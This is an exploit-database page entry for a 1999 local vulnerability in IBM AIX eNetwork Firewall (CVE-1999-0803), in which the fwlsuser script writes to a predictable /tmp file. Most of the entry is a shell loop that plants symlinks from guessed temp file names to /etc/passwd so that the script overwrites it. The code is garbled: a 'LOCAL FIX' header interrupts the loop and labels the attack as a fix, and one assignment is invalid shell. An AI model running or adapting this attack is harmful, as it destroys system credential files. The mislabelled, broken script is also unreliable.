[] NeoSense
E X P L O I T S
title author type platform port cve id

IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation

Author: Paul Cammidge
type: local
platform: aix
port: 
date_added: 1999-05-25 
date_updated: 2012-06-16 
verified: 1 
codes: CVE-1999-0803;OSVDB-962 
tags: 
aliases:  
screenshot_url:  
application_url: 
soure: https://www.securityfocus.com/bid/287/info

IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file.

x = 5000
while true

LOCAL FIX AS REPORTED BY ORIGINATOR:
ln -s /etc/passwd /tmp/fwlsuser.$x
# rm /tmp/fwlsuser.$x
let x=$x+1
echo $x
done
exit
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.